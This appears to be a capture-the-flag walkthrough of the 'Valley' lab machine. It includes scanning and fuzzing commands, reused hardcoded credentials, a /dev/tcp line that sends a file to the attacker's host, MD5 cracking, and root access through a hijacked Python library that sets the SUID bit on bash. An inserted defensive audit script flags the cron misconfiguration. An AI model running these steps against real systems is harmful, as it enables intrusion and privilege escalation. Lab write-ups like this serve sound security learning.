
Valley

This report details the penetration testing of the "Valley" machine. The engagement began with reconnaissance, identifying open ports and services. Vulnerabilities were discovered in a web application, including directory traversal and exposed credentials. These vulnerabilities were leveraged to gain initial access via SSH. Further enumeration revealed a misconfigured cron job, leading to privilege escalation and full root access.

1. Reconnaissance and Enumeration

1.1. Port Scanning

export TARGET_IP=10.10.146.21
nmap -p- --min-rate 5000 $TARGET_IP

Output:

Not shown: 65441 closed tcp ports (reset), 91 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
37370/tcp open unknown

1.2. Web Application Enumeration

The presence of an HTTP server on port 80 prompted an investigation of the web application.

1.2.1. Directory Traversal Hypothesis

Browsing to http://$TARGET_IP/gallery/gallery.html revealed a gallery of images. Clicking on an image led to a URL like http://$TARGET_IP/static/1. This numerical pattern suggested a potential directory traversal or predictable resource location vulnerability.

1.2.2. Directory Bruteforcing

To test this hypothesis, ffuf (a fast web fuzzer) was used to enumerate potential files within the /static/ directory. A wordlist of numbers was generated using seq.

seq -w 0 99 > numbers.txt  # Create a wordlist with numbers 00 to 99.
ffuf -u http://$TARGET_IP/static/FUZZ -w numbers.txt

Output:

00                      [Status: 200, Size: 127, Words: 15, Lines: 6, Duration: 424ms]

Findings:

  • A file named 00 was returned with a 200 OK status code, indicating that the resource exists.

1.2.3. Developer Notes

Accessing http://$TARGET_IP/static/00 revealed developer notes:

dev notes from valleyDev:
-add wedding photo examples
-redo the editing on #4
-remove /dev1243224123123
-check for SIEM alerts

Key Finding: The note -remove /dev1243224123123 indicated a potentially sensitive directory that was intended to be removed.

1.3. Hidden Directory and Login Page

Browsing to http://$TARGET_IP/dev1243224123123/ revealed a login page. This suggests a development or administrative interface.

1.3.1. Source Code Review

The login page's JavaScript source code was reviewed to understand the authentication mechanism. This is a crucial step in identifying potential bypasses.

// (Simplified for clarity and brevity)
function isValidUsername(username) {
  // Reversed logic: valid if length < 5
  return username.length < 5;
}

function isValidPassword(password) {
  // Reversed logic: valid if length < 7
  return password.length < 7;
}

loginButton.addEventListener("click", (e) => {
  e.preventDefault();
  const username = loginForm.username.value;
  const password = loginForm.password.value;

  if (username === "siemDev" && password === "california") {
    window.location.href = "/dev1243224123123/devNotes37370.txt";
  } else {
    loginErrorMsg.style.opacity = 1;
  }
});

Findings:

  • Hardcoded Credentials: The username siemDev and password california were found directly in the JavaScript.
  • Reversed validation logic: a username is only accepted if its length is less than 5, and a password only if its length is less than 7.

1.4. FTP Enumeration

/dev1243224123123/devNotes37370.txt contained:

dev notes for ftp server:
-stop reusing credentials
-check for any vulnerabilies
-stay up to date on patching
-change ftp port to normal port

This strongly suggested that port 37370 might be running an FTP service.

1.4.1. FTP Login and File Download

Using the previously discovered credentials (siemDev:california), we connected to the FTP server on port 37370 and downloaded a PCAP file.

ftp $TARGET_IP 37370
# Login with siemDev:california
mget siemHTTP2.pcapng # Download the file

1.4.2. PCAP Analysis (Wireshark)

The downloaded siemHTTP2.pcapng file was analyzed using Wireshark, a network protocol analyzer. Focusing on HTTP traffic, we searched for sensitive data.

Finding: Packet number 2335 contained URL-encoded form data, revealing another set of credentials:

Form item: "uname" = "valleyDev"
Form item: "psw" = "ph0t0s1234"
Form item: "remember" = "on"

2. Initial Access (SSH)

The credentials obtained from the PCAP file (valleyDev:ph0t0s1234) were used to successfully log in to the machine via SSH.

ssh valleyDev@$TARGET_IP  # Password: ph0t0s1234

3. Hash Cracking

We transferred the file valleyAuthenticator from /home/ to our machine using netcat and searched its printable strings for anything password-related.

# Receiver (attacking machine)
nc -lvnp 6666 > valleyAuthenticator
# Sender (target)
cat valleyAuthenticator > /dev/tcp/10.2.17.44/6666  # Replace with your IP
strings valleyAuthenticator | grep -C 10 "pass"

We noticed the following strings:

A [3	<
?ATs
-^;x&
e6722920bab2326f8217e4
bf6b1b58ac
ddJ1cc76ee3
beb60709056cfbOW
elcome to Valley Inc. Authentica
[k0rHh
is your usernad
Ol: /passwXd.{
~{edJrong P=
sL_striF::_M_M
v0ida%02xo
~ c-74
lrec
{4_af$
oBof '
1__g
_lock_
rorOu

The string e6722920bab2326f8217e4bf6b1b58ac has 32 characters, which is the length of an MD5 hash, so we proceed to identify the hash and crack it.

hashcat --identify e6722920bab2326f8217e4bf6b1b58ac
    # | Name                 | Category
======+======================+==========
  900 | MD4                  | Raw Hash
    0 | MD5                  | Raw Hash
   70 | md5(utf16le($pass))  | Raw Hash
  ...
hashcat -a 0 -m 0 e6722920bab2326f8217e4bf6b1b58ac /usr/share/wordlists/rockyou.txt # e6722920bab2326f8217e4bf6b1b58ac:liberty123
su valley # Password: liberty123

4. Privilege Escalation

4.1. Local Enumeration

The next step was to enumerate the system for potential privilege escalation vectors. This included checking user privileges, group memberships, and running processes.

id  # Check user and group IDs

Finding: The valley user was a member of the valleyAdmin group.

4.2. Group-Based File Permissions

A search for files owned by the valleyAdmin group was conducted to identify potential targets for privilege escalation.

find / -group valleyAdmin -type f 2>/dev/null

Finding: /usr/lib/python3.8/base64.py was owned by the valleyAdmin group. This is a standard Python library, suggesting a potential for library hijacking.

4.3. Cron Job Analysis

The /etc/crontab file was examined to identify scheduled tasks (cron jobs). Cron jobs are often a source of privilege escalation if they run with elevated privileges and interact with files writable by a lower-privileged user.

cat /etc/crontab

Finding: The following cron job was found:

1  *    * * *   root    python3 /photos/script/photosEncrypt.py

This cron job runs /photos/script/photosEncrypt.py as the root user every minute. The script uses the base64 Python library.

head /photos/script/photosEncrypt.py #check the file content
#!/usr/bin/python3
import base64
...

4.4. Library Hijacking

Because the valley user (via the valleyAdmin group) had write access to /usr/lib/python3.8/base64.py, and this library was used by a root-run cron job, a library hijacking attack was possible.

The base64.py file was modified to add a command that would set the SUID bit on /bin/bash. The SUID bit allows a binary to be executed with the permissions of the file's owner (in this case, root).

nano /usr/lib/python3.8/base64.py

Added Code (at the beginning of the file):

import os
os.system("chmod u+s /bin/bash")
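An audit that detects the misconfiguration described in 4.2 to 4.4 from the defender's side, added here as an example (not part of the original write-up): it reads a crontab, keeps the root-run Python jobs, resolves each script's imports to files, and reports any script or module that someone other than a trusted owner could modify. The lib_dirs and trusted_uids parameters are assumptions of this example; by default it searches sys.path and trusts only uid 0.

```python
import os, re, stat, sys

# One crontab entry: five schedule fields, the user, then the command line.
CRON_RE = re.compile(r"^\s*(\S+\s+\S+\s+\S+\s+\S+\s+\S+)\s+(\S+)\s+(.+)$")
IMPORT_RE = re.compile(r"^\s*(?:import|from)\s+([A-Za-z_]\w*)", re.M)
def writable_by_others(path, trusted_uids=(0,)):
    """Say why someone other than a trusted owner could modify path ('' if nobody can)."""
    st = os.stat(path)
    reasons = []
    if st.st_uid not in trusted_uids:
        reasons.append(f"owned by uid {st.st_uid}")
    if st.st_mode & stat.S_IWGRP:
        reasons.append(f"group-writable (gid {st.st_gid})")
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    return ", ".join(reasons)

def resolve_module(name, lib_dirs):
    """Locate a top-level module as name.py or name/__init__.py in lib_dirs."""
    for d in lib_dirs:
        for cand in (os.path.join(d, name + ".py"), os.path.join(d, name, "__init__.py")):
            if os.path.isfile(cand):
                return cand
    return None

def audit_crontab(crontab_text, lib_dirs=None, trusted_uids=(0,)):
    """Return (script, path, reason) for root cron jobs whose Python script or an imported module is modifiable by an untrusted user."""
    lib_dirs = sys.path if lib_dirs is None else lib_dirs
    findings = []
    for line in crontab_text.splitlines():
        m = CRON_RE.match(line)
        if line.lstrip().startswith("#") or not m or m.group(2) != "root":
            continue
        argv = m.group(3).split()
        if len(argv) < 2 or not os.path.basename(argv[0]).startswith("python"):
            continue
        script = argv[1]
        try:
            with open(script) as f:
                source = f.read()
        except OSError:
            continue  # script missing or unreadable from here
        # The script itself and each imported module are files root will execute.
        targets = [script] + [resolve_module(n, lib_dirs) for n in IMPORT_RE.findall(source)]
        for path in filter(None, targets):
            reason = writable_by_others(path, trusted_uids)
            if reason:
                findings.append((script, path, reason))
    return findings
```

On the Valley host, feeding it the contents of /etc/crontab would report /usr/lib/python3.8/base64.py as group-writable for the photosEncrypt.py job; a clean system returns an empty list.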

4.5. Gaining Root Access

After waiting for the cron job to execute, the permissions of /bin/bash were checked.

ls -l /bin/bash

Output (after waiting):

-rwsr-xr-x 1 root root 1183448 Apr 18  2022 /bin/bash

The s in the permissions string (-rwsr-xr-x) indicates that the SUID bit is set. Now, /bin/bash can be executed with root privileges using the -p option, which stops bash from resetting its effective user ID to the real user ID at startup.

bash -p  # Execute bash with preserved privileges
id # Verify effective user ID (euid)

Output:

uid=1000(valley) gid=1000(valley) euid=0(root) groups=1000(valley),1003(valleyAdmin)

Result: The euid=0(root) confirms that we have successfully gained root access.